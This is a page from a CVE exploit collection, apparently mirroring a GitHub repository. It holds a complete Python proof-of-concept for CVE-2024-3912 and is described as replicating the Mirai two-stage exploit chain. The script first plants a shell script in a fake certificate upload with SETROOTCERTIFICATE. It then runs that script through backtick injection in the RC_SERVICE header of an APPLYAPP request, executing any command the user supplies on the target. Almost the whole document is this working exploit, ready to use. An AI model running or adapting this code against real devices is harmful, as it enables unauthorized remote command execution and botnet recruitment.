5465 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-3912
README.md
Rendering markdown...
POC / poc.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
"""
SETROOTCERTIFICATE + APPLYAPP honeypot test — replicates the exact Mirai
two-stage exploit chain

Stage 1: SETROOTCERTIFICATE writes a shell script to /tmp/etc/cert.pem.1
Stage 2: APPLYAPP triggers execution via RC_SERVICE backtick injection
"""

import socket
import ssl
import sys
import time

if len(sys.argv) < 4:
    print('poc.py ipaddress port "command to run"')
    exit()

TARGET_HOST = sys.argv[1] 
TARGET_PORT = int(sys.argv[2])
COMMAND = sys.argv[3]


def tls_connect(host, port):
    sock = socket.create_connection((host, port), timeout=10)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx.wrap_socket(sock, server_hostname=host)


def send_recv(tls_sock, request_bytes):
    tls_sock.sendall(request_bytes)
    response = b""
    try:
        while True:
            chunk = tls_sock.recv(4096)
            if not chunk:
                break
            response += chunk
    except (socket.timeout, ConnectionResetError):
        pass
    tls_sock.close()
    return response


# Stage 1: Write the payload to /tmp/etc/cert.pem.1
BODY = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>'
    "<content>"
    "<key>-----BEGIN RSA PRIVATE KEY-----id</key>"
    "<cert>#!/bin/sh\n"
    "#-----BEGIN CERTIFICATE-----\n"
    "\n"
    "<![CDATA[command-to-run\n"
    "]]>\n"
    "</cert>"
    "<intermediate_crt>-----BEGIN CERTIFICATE-----</intermediate_crt>"
    "</content>"
).replace('command-to-run',COMMAND)

STAGE1 = (
    f"SETROOTCERTIFICATE /favicon.ico/ HTTP/1.1\r\n"
    f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    f"Connection: close\r\n"
    f"\r\n"
    f"{BODY}"
).encode("utf-8")

# Stage 2: Trigger execution via RC_SERVICE backtick injection
STAGE2 = (
    f"APPLYAPP /favicon.ico/ HTTP/1.1\r\n"
    f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n"
    f"ACTION_MODE: apply\r\n"
    f"SET_NVRAM: aa\r\n"
    f"RC_SERVICE: `sh /etc/cert.pem.1`\r\n"
    f"Connection: close\r\n"
    f"\r\n"
).encode("utf-8")

# Execute
print(f"[*] Stage 1: Writing payload via SETROOTCERTIFICATE...")
sock1 = tls_connect(TARGET_HOST, TARGET_PORT)
resp1 = send_recv(sock1, STAGE1)
print(f"    Response ({len(resp1)} bytes): {resp1.decode('utf-8', errors='replace')[:200]}")

time.sleep(1)

print(f"[*] Stage 2: Triggering execution via APPLYAPP RC_SERVICE injection...")
sock2 = tls_connect(TARGET_HOST, TARGET_PORT)
resp2 = send_recv(sock2, STAGE2)
print(f"    Response ({len(resp2)} bytes): {resp2.decode('utf-8', errors='replace')[:200]}")

print()
print("[*] Check: for command success or something idk")